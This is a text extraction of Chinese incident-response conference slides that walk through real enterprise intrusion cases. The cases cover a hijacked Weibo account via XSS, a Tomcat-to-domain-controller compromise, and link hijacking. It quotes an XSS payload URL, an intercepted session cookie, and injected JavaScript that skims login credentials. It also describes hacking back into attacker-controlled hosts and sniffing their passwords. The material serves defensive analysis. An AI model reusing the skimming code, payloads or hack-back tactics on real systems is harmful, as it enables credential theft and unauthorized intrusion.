9“企业应急响应与反渗透”之真实案例分析

“企业应急响应以及反渗透”之真实案例分析关于我•piaca•乌云⽩白帽⼦子•InsightLabs成员•前新浪安全架构师•⼋八年安全从业经验•应急响应介绍•⼀一些案例•总结什么是应急响应？被“⿊黑”了•被⼊入侵•被DDoS•被劫持•被蠕⾍虫•被钓⻥鱼•……为什么做应急响应？被逼的•保障业务•解决⽅方案•司法途径•还原攻击•明确意图为什么做应急响应？•查漏补缺怎么做应急响应？•确定攻击时间•查找攻击线索•实施解决⽅方案怎么做应急响应？•定位攻击⼈人，取证•梳理攻击流程为什么做反渗透？•被动变主动•攻击者都在做什么为什么反渗透？•确认攻击者是谁•取证案例之官微帐号被盗•⾮非⼯工作⼈人员操作•帐号有被cookie登录分析原因•可是cookie有httponly==================================================URL::2012-7-1619:22:27====================================================================================================URL::2012-7-1619:22:28Referrer:====================================================================================================URL:http://**.***.com/_common/jwplayer/player.swf?debug=(function(){location.href=%27javascript:%22%3Cscript/src=})LastVisitDate:2012-7-1619:22:28Referrer::player.swf(application/x-shockwave-flash对象)====================================================================================================URL:=0&cookie=ULV%3D1342421444188%3A342%3A12%3A1%3A306588567000.3021.1342421444076%3A1342141514702%3B%20__utma%3D182865017.844076418.1336462885.1341536058.1341543017.15%3B%20__utmz%3D182865017.1341473198.13.8.utmcsr%3Dweibo.com%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D/breakingnews%3B%20vjuids%3Ddae3c1e13.1369ca9b037.0.1a9eb5f46e6ac8%3B%20vjlast%3D1334068228.1341096989.11%3B%20UOR%3D%2C%2C%3B%20un%3Dxlttnews@sina.com%3B%20wvr%3D3.6%3B%20_s_tentry%3Dnews.sina.com.cn%3B%20Apache%3D306588567000.3021.1342421444076%3B%20SINAGLOBAL%3D306588567000.3021.1342421444076%3B%20SUS%3DSID-1618051664-1342421545-XD-z8hcn-efefbc9f4464bf215caf1d6b0da488bf%3B%20SUE%3Des%253D5937b4f4509871fc45195767ea7abe37%2526ev%253Dv1%2526es2%253Da42f0190f7b1f5137f761f625bbe0e81%2526rs0%253DpnLlydVz7IsdBcHbRCS8Tdb1KmHl7c%25252F758lHMKQRftFZBm9EDKoFVF7jexRKPF8CpY3rjGOora0pZ%25252FyDJSaDWJxRQn020MpsJxXhf5NdP2h3jfo2V%25252FoQgA0olYEWGJNQIDFZDfkndhSSXCp%25252BldHRW%25252BkEMwhvhY4p3xR0Ki5ja94%25253D%2LastVisitDate:2012-7-1619:22:31Referrer:http://**.***.com/_common/jwplayer/player.swf?debug=(function(){location.href=%27javascript:%22%3Cscript/src=})==================================================⼯工作⼈人员收到⼀一条私信……•某分站XSS•某分站ApacheCVE-2012-0053还原攻击•修复漏洞，修复同类漏洞•加强员⼯工安全意识我们做了什么•增加帐号安全策略•通过IP/邮箱信息定位到某公司安全⼈人员•没有恶意⺫⽬目的关于攻击者•后⾯面有把漏洞提交乌云案例之500错误⽇日志引发的⾎血案•500错误代表⽂文件存在并且执⾏行•⾮非业务⽂文件分析原因•从更多的⽇日志⼊入⼿手•通过⽇日志确认⼊入侵途径是tomcat•做了⼀一些操作还原攻击•tomcat帐号密码并⾮非弱密码，how？•全⺴⽹网排查•攻击者早在⼏几⽉月前就发⽣生再次分析原因并且还原攻击•通过收集帐号密码•收集攻击者IP•⼤大多是⾁肉鸡IP，⾹香港，廊坊吹响反击号⾓角•⽤用“⿊黑客”的⽅方法拿到⾹香港，廊坊多台⾁肉鸡权限•在⾁肉鸡上发现⼤大量⿊黑客⼯工具和扫描⽇日志•在⾁肉鸡上发现内⺴⽹网仍有服务器被控制•清理全⺴⽹网tomcat我们做了什么•修改业务相关帐号密码•部署snort•IDC出⼝口策略•梳理全⺴⽹网web⺫⽬目录⽂文件•修改业务关键代码•清理后⻔门这就完了？很傻很天真IT反馈域控服务器异常gh0st•多台服务器被植⼊入后⻔门继续分析•通过at⽅方式植⼊入后⻔门•通过域控管理帐号•确定被植⼊入后⻔门最初时间2011-­‐11-­‐10,14:03:47,Security,审核成功,登录/注销  ,540,*\*,PDC,”成功的网络登录:    用户名:  *.ad    域:    *    登录  ID:    (0x0,0x1114E11)    登录类型:  3    登录过程:  NtLmSsp      身份验证数据包:  NTLM    工作站名:  CC-­‐TEST-­‐V2    登录  GUID:  -­‐    调用方用户名:  -­‐    调用方域:  -­‐    调用方登录  ID:  -­‐    调用方进程  ID:  -­‐    传递服务:  -­‐    源网络地址:  192.168.100.81    源端口:  02011-­‐11-­‐10,3:13:38,Security,审核失败,帐户登录  ,680,NT  AUTHORITY\SYSTEM,PDC,尝试登录的用户:    MICROSOFT_AUTHENTICATION_PACKAGE_V1_0  登录帐户:      QM-­‐*$  源工作站:    CC-­‐TEST-­‐V2  错误代码:    0xC000006A  2011-­‐11-­‐10,3:13:38,Security,审核失败,帐户登录  ,680,NT  AUTHORITY\SYSTEM,PDC,尝试登录的用户:    MICROSOFT_AUTHENTICATION_PACKAGE_V1_0  登录帐户:      QM-­‐*$  源工作站:    CC-­‐TEST-­‐V2  错误代码:    0xC000006A•虚拟机192.168.100.81•弱⼝口令•内⺴⽹网检查时关机，逃过检查•⺫⽬目前能够确定这台是最初被渗透的•域控管理登录过•通过抓去hash控制域控•snort加特征，发现仍有服务器被控制我们⼜又做了什么•排查所有windows服务器•继续排查•还有美国的IP持续反击中•通过C段cain嗅探到3389密码•美国的vps上含有多个QQ和密码关于攻击者•之前获取到其国内论坛帐号案例之永⽆无⽌止境的劫持•某业务多次多种类型劫持•某业务链路劫持被插⼊入⼲⼴广告案例之永⽆无⽌止境的劫持•DNS劫持•链路劫持•劫持到⼀一个反向代理IP61.*.*.2functionffCheck(){try{try{varu=null!=f?f.idInput.value:document.getElementById(idInput).value;}catch(e){varu=(document.getElementById(idInput).innerHTML).replace(/\s/g,);}varp=null!=f?f.pwdInput.value:document.getElementById(pwdInput).value;if(u.indexOf(@)==-1)u+=@xxx.com;try{if(u.indexOf(@)==-1)u=u+getdomain();}catch(e){}sendurl(/abc,u,p,coremail);}catch(e){}returnfOnSubmit();}functionsendurl(uri,u,p,i){xmlHttp=GetXmlHttpObject();if(xmlHttp==null){return;}param=user=+u+&pass=+p+&icp=+i;xmlHttp.onreadystatechange=stateChanged;try{xmlHttp.open(POST,uri+?t=+(newDate()).valueOf(),true);}catch(e){}xmlHttp.setRequestHeader(If-Modified-Since,0);xmlHttp.setRequestHeader(Content-Type,application/x-);xmlHttp.send(param);}•定位劫持位置•投诉处理过程•TTL•IP然并卵•完善监控•https?我们做了什么•业务⾓角度总结•保障业务优先•对抗⾓角度•了解对⼿手•技术⾓角度•攻击技术•⽇日志、流量等数据谢谢！